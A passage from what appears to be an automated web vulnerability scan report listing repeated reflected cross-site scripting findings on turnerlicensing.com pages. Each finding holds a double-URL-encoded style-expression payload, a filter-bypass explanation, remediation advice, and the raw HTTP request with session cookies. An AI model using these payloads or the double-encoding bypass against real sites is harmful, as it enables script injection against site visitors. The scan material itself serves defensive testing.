The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /11x17_sound_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /2_year_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /3_ring_binders
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /3_subject_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /5x8_notepads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /5x8_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /MLB
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NFL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NHL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Players
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Stadiums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Turner-Contact-Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /Turner-Email-Sign-Up
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
